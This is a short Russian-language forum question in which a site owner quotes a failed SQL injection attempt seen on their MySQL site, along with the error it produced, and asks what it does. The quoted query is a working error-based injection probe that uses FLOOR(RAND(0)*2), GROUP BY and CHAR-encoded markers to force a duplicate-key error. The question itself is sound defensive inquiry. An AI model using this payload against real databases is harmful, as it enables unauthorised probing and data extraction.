Атака SQL-инъекций - что это делает?
Я обнаружил несколько неудачных SQL-атак на моем сайте. Неудачные запросы имеют форму:
SELECT 6106 FROM(SELECT COUNT(*),':sjw:1:ukt:1'x FROM
information_schema.tables GROUP BY x)
':sjw:1:ukt:1' Часть специально создана с переменными, соединенными вместе, чтобы дать случайные 0 или 1 и т. д.
Я хотел бы знать, что делают эти запросы?
База данных MySQL.
Update: Вот оригинальный введенный SQL:
(SELECT 6106
FROM (SELECT COUNT(*),
CONCAT(
CHAR(58, 115, 106, 119, 58),
(SELECT ( CASE WHEN ( 6106 = 6106 ) THEN 1 ELSE 0 END )),
CHAR(58, 117, 107, 116, 58),
FLOOR(RAND(0) * 2)
) x
FROM INFORMATION_SCHEMA.TABLES
GROUP BY x)a)
Это не с сообщением
Duplicate entry ':sjw:1:ukt:1' for key 'group_key'